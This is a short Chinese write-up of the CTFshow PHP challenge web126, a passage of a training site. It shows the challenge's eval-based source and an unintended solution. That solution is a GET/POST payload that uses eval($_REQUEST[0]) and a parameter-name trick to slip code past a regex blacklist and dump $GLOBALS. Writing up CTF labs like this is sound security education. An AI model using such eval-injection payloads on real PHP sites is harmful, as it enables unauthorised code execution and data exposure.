CTFshow php特性 web126
目录
- 源码
- 思路
- 题解
- 非预期
- 总结
源码
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print|g|i|f|c|o|d/i", $c) && strlen($c)<=16){eval("$c".";"); if($fl0g==="flag_give_me"){echo $flag;}}
}思路
看了很多大佬的解法,我来一个非预期吧
看起来限制了很多字母,当时$_REQUEST还是可以用的,我们可以用它来参数逃逸
题解
非预期
get: ?0=var_export($GLOBALS);
post: CTF_SHOW=1&CTF[SHOW.COM=1&fun=eval($_REQUEST[0])
总结
水题
CTFshow php特性 web126相关推荐
- ctfshow php特性 下
目录 web113 web114 web115 web123(php解析特性) web125 web126 web127(php解析特性) web128 web129 web130 web131 we ...
- ctfshow php特性(89——150plus)
web89 这题的逻辑是如果存在$_GET['num'],则用正则表达式匹配$num中的值,如果成功匹配则程序终止于"no no no",否则进行下一步,如果intval($num ...
- ctfshow php特性 web89-web115 web123-150wp
php特性 参考博客仍然是南神博客 文章目录 php特性 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 web10 ...
- CTFshow php特性 web150plus
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web150
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web147
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web140
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web138
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web137
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
最新文章
- 高岭土吸附阳离子_工业中高岭土、高岭石中的应用特点!
- ssd3 employee.java_SSD3Panswers icarnegie ssd3的所有答案~十分齐全 - 下载 - 搜珍网
- 【科普】让人头秃的理论:什么是“奥卡姆剃刀”原理?
- 做百度AI工程师,还要会“相牛”?
- 虚拟机中dns配置好了但是域名ping不同_弱电工程中常用的几个网络命令,学会后轻松变高手...
- 两个getchar,一个getchar,getch的不同点 出现的不同情况
- java实现输出下一秒_编写一个函数,要求输入年月日时分秒,输出该年月日时分秒的下一...
- 【转】Qt调用dll中的功能函数
- python后端教程_Python学习教程(技术干货):关于前后端分离开发入门
- IIS配置aspnet常见为题
- Eyoucms易优小程序插件2.0版本上线
- 开源 MQTT 服务器
- c java long_C语言中输出long long型数据怎么输出
- Nginx搭建反向代理服务器
- winwodws下c语言延时函数,lex实验报告(共10篇).doc
- ios 下拉菜单Menu
- 《禅与摩托车维修艺术》摘录(一)
- ubuntu 使用代理服务器 squid
- 当代超吸金的行业“Python工程师”,如何快速从Pytho入门到初级Python工程师?
- python名片管理器实验报告_名片管理系统——实验报告.doc